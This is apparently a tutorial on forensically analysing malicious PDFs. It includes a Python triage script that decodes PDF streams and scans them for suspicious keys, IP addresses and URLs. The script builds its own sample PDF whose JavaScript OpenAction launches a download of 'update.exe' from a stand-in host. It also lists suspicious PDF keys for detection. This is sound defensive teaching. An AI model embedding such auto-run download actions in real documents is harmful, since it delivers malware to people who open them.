Malware analysis (Part 2) - Digital forensics of malicious files
Recently I did a post on the digital investigation of a backdoored PDF; in that post I described the PDF structure and how to analyse this type of malicious file. In this post we will see another method of investigating these malicious files. We will separate all the attachments and stream objects from the malicious PDF file and then check whether any of them contains malicious content, such as a listener IP address or a dropper.

Creating the malicious file

STEP 1. First I am going to create an infected PDF for analysis; I won't create a listener, as this is for tutorial purposes only. I am going to inject this exploit into a clean PDF file for this experiment. As you can see below, I am supplying the path of the clean PDF file. After running it I got the evil PDF.

Starting the investigation

We have created our file, now it's time to investigate it. So clone this GitHub repository by typing git clone https://github.com/gdelugre/origami.git ...
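The investigation step the post describes, pulling every object out of the PDF, decoding its stream and looking for a listener address or dropper URL inside, is shown below as an added example. This is not code from the original post and it is not origami; it is a deliberately small stand-in written for this page that only understands uncompressed and FlateDecode streams, and the PDF it inspects is constructed inline (the JavaScript action and the 203.0.113.10 address are made-up sample values from the TEST-NET-3 documentation range, not real indicators).

```python
import re
import zlib

# Object and stream boundaries in the raw PDF bytes. A real parser would walk
# the cross-reference table instead; regex scanning is good enough for triage.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\s*(.*?)\s*endobj", re.DOTALL)
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.DOTALL)

# Dictionary keys that deserve a closer look during PDF triage.
SUSPICIOUS_KEYS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
                   b"/URI", b"/EmbeddedFile", b"/RichMedia"]
IP_RE = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(rb"(?:https?|ftp)://[^\s'\")<>]+")


def inflate(data):
    """Inflate a FlateDecode stream; return partial output if it is truncated
    (malicious files are often cut short or carry a bad checksum on purpose)."""
    try:
        return zlib.decompress(data)
    except zlib.error:
        try:
            return zlib.decompressobj().decompress(data)
        except zlib.error:
            return b""


def extract_objects(pdf_bytes):
    """Split the PDF into its objects and decode each object's stream body."""
    objects = []
    for num, gen, body in OBJ_RE.findall(pdf_bytes):
        m = STREAM_RE.search(body)
        dictionary = body[:m.start()] if m else body
        stream = None
        if m:
            raw = m.group(1)
            stream = inflate(raw) if b"/FlateDecode" in dictionary else raw
        objects.append({"id": f"{num.decode()} {gen.decode()}",
                        "dict": dictionary, "stream": stream})
    return objects


def scan_pdf(pdf_bytes):
    """Return one finding per object that carries a suspicious key, IP or URL."""
    findings = []
    for obj in extract_objects(pdf_bytes):
        haystack = obj["dict"] + (obj["stream"] or b"")
        keys = [k.decode() for k in SUSPICIOUS_KEYS if k in haystack]
        ips = sorted({i.decode() for i in IP_RE.findall(haystack)})
        urls = sorted({u.decode(errors="replace") for u in URL_RE.findall(haystack)})
        if keys or ips or urls:
            findings.append({"object": obj["id"], "keys": keys,
                             "ips": ips, "urls": urls})
    return findings


def build_sample_pdf():
    """Constructed sample: a one-page PDF whose /OpenAction runs JavaScript
    stored in a FlateDecode stream that points at a (fake) remote host."""
    js = b"app.launchURL('http://203.0.113.10/update.exe', true);"
    compressed = zlib.compress(js)
    objs = [
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>\nendobj\n",
        b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n",
        b"3 0 obj\n<< /Type /Page /Parent 2 0 R >>\nendobj\n",
        b"4 0 obj\n<< /Type /Action /S /JavaScript /JS 5 0 R >>\nendobj\n",
        b"5 0 obj\n<< /Length " + str(len(compressed)).encode()
        + b" /Filter /FlateDecode >>\nstream\n" + compressed
        + b"\nendstream\nendobj\n",
    ]
    return b"%PDF-1.4\n" + b"".join(objs) + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    for finding in scan_pdf(build_sample_pdf()):
        print(finding)
```

Running it prints three findings: the catalog (because of /OpenAction), the action dictionary (/JavaScript and /JS) and the decoded stream, which is where the IP address and the download URL surface. Notice that the URL is invisible in the raw file until the stream is inflated, which is exactly why the post separates the stream objects before looking for indicators. A tool such as origami goes further than this stand-in: it follows the cross-reference table, unpacks object streams and handles the other filters (ASCIIHex, LZW, RunLength and so on) that malware uses to hide the same content.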